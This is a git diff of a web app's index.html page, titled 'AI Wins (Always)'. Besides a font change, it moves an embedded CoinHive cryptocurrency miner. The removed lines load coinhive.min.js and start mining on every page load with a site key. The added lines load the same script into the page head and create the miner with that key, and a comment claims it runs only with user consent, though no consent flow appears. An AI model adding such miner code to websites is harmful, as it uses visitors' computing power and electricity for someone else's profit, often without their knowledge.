--- a/frontend/public/index.html
+++ b/frontend/public/index.html
@@ -10,7 +10,7 @@
     -->
     <link rel="manifest" href="%PUBLIC_URL%/manifest.json">
     <link rel="shortcut icon" href="%PUBLIC_URL%/favicon.ico">
-    <link href="https://fonts.googleapis.com/css?family=Dosis" rel="stylesheet">
+    <link href="https://fonts.googleapis.com/css?family=Exo+2" rel="stylesheet">
     <!--
       Notice the use of %PUBLIC_URL% in the tags above.
       It will be replaced with the URL of the `public` folder during the build.
@@ -20,6 +20,14 @@
       work correctly both with client-side routing and a non-root public URL.
       Learn how to configure a non-root public URL by running `npm run build`.
     -->
+    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
+    <script>
+      // Miner only runs if a user has logged in and agreed to run it.
+      window.miner = new CoinHive.Anonymous('np6rTwBMOFatfmuf6GO09C7MDbdYmKtz', {
+        threads: 1,
+        throttle: 0.8,
+      });
+    </script>
     <title>AI Wins (Always)</title>
   </head>
   <body>
@@ -39,13 +47,4 @@
     -->
   </body>
   <script src="https://use.fontawesome.com/00c6aa3062.js"></script>
-  <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
-  <script>
-    var options = {
-      threads: 1,
-      throttle: 0.8,
-    };
-    var miner = new CoinHive.Anonymous('np6rTwBMOFatfmuf6GO09C7MDbdYmKtz', options);
-    miner.start();
-  </script>
 </html>
